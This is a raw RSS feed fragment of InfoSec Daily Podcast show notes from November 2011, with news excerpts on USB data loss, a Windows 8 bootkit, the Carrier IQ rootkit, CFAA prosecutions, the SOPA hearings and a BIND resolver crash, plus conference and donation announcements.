	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theage.com.au/digital-life/computers/usb-keys-are-unexploded-security-bombs-in-companies-20111116-1nhqg.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theage.com.au/digital-life/computers/usb-keys-are-unexploded-security-bombs-in-companies-20111116-1nhqg.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BLEEDING Edge can imagine the consternation at Computershare, the Melbourne-based share registry company, when a Boston employee quit the company, allegedly after taking home a company notebook computer and &#8211; without authorisation &#8211; copying thousands of pages of highly sensitive and confidential documents to a USB flash drive.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A court in Boston has been told Computershare has been unable to track down the original USB drive, although the company has retrieved one of two USB devices still in the woman&#39;s possession.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Although Bleeding Edge bought the world&#39;s first USB key, the Trek ThumbDrive, at a Melbourne PC show many years ago &#8211; it cost $350 for 32 megabytes of storage &#8211; and we have lost count of our subsequent USB purchases, we have always believed the initials don&#39;t actually stand for universal serial bus.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As far as we&#39;re concerned, a USB key is an unexploded security bomb, waiting to blow up in the user&#39;s face.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Business users should definitely consider changing user profiles to lock out USB access or deploy software to track inappropriate use and malware threats. But in the home or small business, those USB ports are simply too useful to deactivate.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In those environments, the threat is not so much the unauthorised transfer of data as the potential for losing many gigabytes of files with sensitive information that could be used to drain one&#39;s bank account or steal one&#39;s identity, or the unwitting transfer of malware.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Those threats also apply to business. According to magazine </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">InformationWeek</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, 70 per cent of businesses in the past two years have traced the loss of sensitive or confidential information to USB sticks. More than half those incidents were related to malware-infected devices that introduced malicious code to corporate networks.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://thehackernews.com/2011/11/worlds-first-windows-8-bootkit-to-be.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://thehackernews.com/2011/11/worlds-first-windows-8-bootkit-to-be.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is amazing how fast security measures are bypassed by hackers. it seems Windows 8 is now Malconed! Peter Kleissner has created the world&#39;s first Windows 8 Bootkit which is planned to be released in India at the International Malware Conference MalCon.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An independent programmer and security analyst, peter was working for an anti-virus company from 2008 to 2009 and was speaker at the Black Hat and Hacking at Random technical security conferences. While his main operating fields are Windows security and analysis of new malware, his recent Important projects include the development of the Stoned Bootkit, a research project to subvert the Windows security model.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A bootkit is built upon the following broad parts:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Infector</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Bootkit</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Drivers</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Plugins (the payload)</span></p>
</li>
</ul>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And as put by peter, those parts are easy to split up in a criminal organization: Teams A-D are writing on the different parts. If you are doing it right, Team D (the payload writers) need no internal knowledge of the bootkit! Peter&#39;s research website: http://www.stoned-vienna.com/</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As per the MalCon website, peter&#39;s travel is still not confirmed citing VISA issues, however, there are chances that the presentation may be done over the video or a speaker may step in on behalf of peter and release it at MalCon.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.xda-developers.com/android/the-rootkit-of-all-evil-ciq/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.xda-developers.com/android/the-rootkit-of-all-evil-ciq/</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And the spy and invasion of privacy saga continues, but this time XDA Recognized Developer TrevE seems to have hit the very core of most of what is happening with devices. You may recall from a few articles back that we started talking about something called CIQ or Carrier iQ. This is, essentially, a piece of software that is embedded into most mobile devices, not just Android but Nokia, Blackberry, and likely many more. According to TrevE, the software is installed as a rootkit software in the RAM of devices where it resides. This software basically is completely hidden from view and in it virtually invisible, and worst of all, rather complicated to kill (some devices more so than others and you will see why in a few minutes). This is given root like rights over the device, which means that it can do everything it pleases and you will have nothing to say about it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.zdnet.co.uk/news/compliance/2011/11/16/doj-seeks-to-outlaw-lying-on-social-networks-40094434/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.co.uk/news/compliance/2011/11/16/doj-seeks-to-outlaw-lying-on-social-networks-40094434/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The US Department of Justice is defending computer hacking laws that make it a crime to use a fake name on Facebook or lie about your weight in an online dating profile at a site like Match.com.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a statement delivered on Tuesday to US Congress, the Justice Department argued that it must be able to prosecute violations of websites&#39; often-ignored, always-unintelligible &quot;terms of service&quot; policies. The law must allow &quot;prosecutions based upon a violation of terms of service or similar contractual agreement with an employer or provider,&quot; according to the Justice Department.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The law in question, the Computer Fraud and Abuse Act (CFAA), has been used by the Justice Department to prosecute a woman, Lori Drew, who used a fake MySpace account to verbally attack a 13-year old girl who then committed suicide. Because MySpace&#39;s terms of service prohibit impersonation, Drew was convicted of violating the CFAA. Her conviction was later thrown out.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Geordy&rsquo;s comments</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: This could make social engineering engagements especially difficult. &nbsp;Damn you </span><a href="http://en.wikipedia.org/wiki/Robin_Sage"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Robin Sage</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">!!</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-525-unexplodedsecuritybombs-win8-bootkit-the-rootkit-of-all-evil-illegal-white-lies/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3167/0/infosec-daily-podcast-episode-525.mp3" length="19188651" type="audio/mpeg" />
		<itunes:duration>0:39:56</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 525 for November 17, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 525 for November 17, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.theage.com.au/digital-life/computers/usb-keys-are-unexploded-security-bombs-in-companies-20111116-1nhqg.html
	BLEEDING Edge can imagine the consternation at Computershare, the Melbourne-based share registry company, when a Boston employee quit the company, allegedly after taking home a company notebook computer and &#8211; without authorisation &#8211; copying thousands of pages of highly sensitive and confidential documents to a USB flash drive.
	A court in Boston has been told Computershare has been unable to track down the original USB drive, although the company has retrieved one of two USB devices still in the woman&#39;s possession.
	Although Bleeding Edge bought the world&#39;s first USB key, the Trek ThumbDrive, at a Melbourne PC show many years ago &#8211; it cost $350 for 32 megabytes of storage &#8211; and we have lost count of our subsequent USB purchases, we have always believed the initials don&#39;t actually stand for universal serial bus.
	As far as we&#39;re concerned, a USB key is an unexploded security bomb, waiting to blow up in the user&#39;s face.
	Business users should definitely consider changing user profiles to lock out USB access or deploy software to track inappropriate use and malware threats. But in the home or small business, those USB ports are simply too useful to deactivate.
	In those environments, the threat is not so much the unauthorised transfer of data as the potential for losing many gigabytes of files with sensitive information that could be used to drain one&#39;s bank account or steal one&#39;s identity, or the unwitting transfer of malware.
	Those threats also apply to business. According to magazine InformationWeek, 70 per cent of businesses in the past two years have traced the loss of sensitive or confidential information to USB sticks. More than half those incidents were related to malware-infected devices that introduced malicious code to corporate networks.
	&#8230;
	Source: http://thehackernews.com/2011/11/worlds-first-windows-8-bootkit-to-be.html
	 
It is amazing how fast security measures are bypassed by hackers. it seems Windows 8 is now Malconed! Peter Kleissner has created the world&#39;s first Windows 8 Bootkit which is planned to be released in India at the International Malware Conference MalCon.
&#160;
An independent programmer and security analyst, peter was working for an anti-vir[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 524 &#8211; Deliberate Blundering, More BIND Lulz, Shiesty Nodes, TDSS &amp; Romanian Arrest</title>
		<link>http://www.isdpodcast.com/episode-524-deliberate-blundering-more-bind-lulz-shiesty-nodes-tdss-romanian-arrest</link>
		<comments>http://www.isdpodcast.com/episode-524-deliberate-blundering-more-bind-lulz-shiesty-nodes-tdss-romanian-arrest#comments</comments>
		<pubDate>Thu, 17 Nov 2011 01:48:13 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3163</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 524 for November 16, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma. Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 524 for November 16, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Marshall University (Huntington, West Virginia) is looking to hire a Assistant Professor-Information Assurance/Security. More info here: </span><a href="http://tinyurl.com/6lkh3o5"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">tinyurl.com/6lkh3o5</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (Search Number: 12709)</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.eff.org/deeplinks/2011/11/public-shut-out-stop-online-piracy-act-hearings-again"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.eff.org/deeplinks/2011/11/public-shut-out-stop-online-piracy-act-hearings-again</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This morning, EFF&rsquo;s staff and concerned netizens across the country tuned into the live webcast of the House Judiciary Committee&rsquo;s hearing on the Stop Online Piracy Act (H.R. 3261). At least we tried to. Unfortunately, we were confronted with an incredibly poor webcast stream for much of the hearing. We find it ironic and deeply concerning that Congress is unable to successfully stream video of an event this important to all Internet users, even as they are debating a dangerous plan to change the Internet in fundamental ways and deputize Internet intermediaries to act like content police.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many of the online watchers took to Twitter to voice their concerns about being shut out of the hearing by the poor quality webcast. But the Internet community was shut out of the hearing in a more fundamental way: of the six witnesses called to testify on Congress&rsquo; plan to heavily regulate the Internet, there was only one representative of the technology sector. &nbsp;As Public Knowledge&rsquo;s Martyn Griffen tweeted: &ldquo;#</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SOPA</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Hearing internet still fading in and out. It&#39;d be great if an internet engineer could fix the website issue in return for testifying.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We couldn&rsquo;t agree more. Congressman Lamar Smith&rsquo;s office noted the poor quality webcast, telling journalist Declan McCullagh: &quot;Our tech folks are trying to fix it, so please be patient.&quot; While the issue wasn&rsquo;t resolved in time for concerned citizens across the nation to watch the testimonies, it was restored in time for the questions and answers at the end.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Recorded video from the hearing should be posted online in the next few hours. &nbsp;Once it&rsquo;s up, we&rsquo;ll post the link here and provide you with our analysis. In the meantime, we urge individuals concerned about the bill to contact their members of Congress today and take part in the American Censorship Day online actions.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.isc.org/software/bind/advisories/cve-2011-tbd"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.isc.org/software/bind/advisories/cve-2011-tbd</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An as-yet unidentified network event caused BIND 9 resolvers to cache an invalid record, subsequent queries for which could crash the resolvers with an assertion failure. ISC is working on determining the ultimate cause by which a record with this particular inconsistency is cached.At this time we are making available a patch which makes named recover gracefully from the inconsistency, preventing the abnormal exit.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The patch has two components. When a client query is handled, the code which processes the response to the client has to ask the cache for the records for the name that is being queried. The first component of the patch prevents the cache from returning the inconsistent data. The second component prevents named from crashing if it detects that it has been given an inconsistent answer of this nature.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CVSS Score: 7.8</span></p>
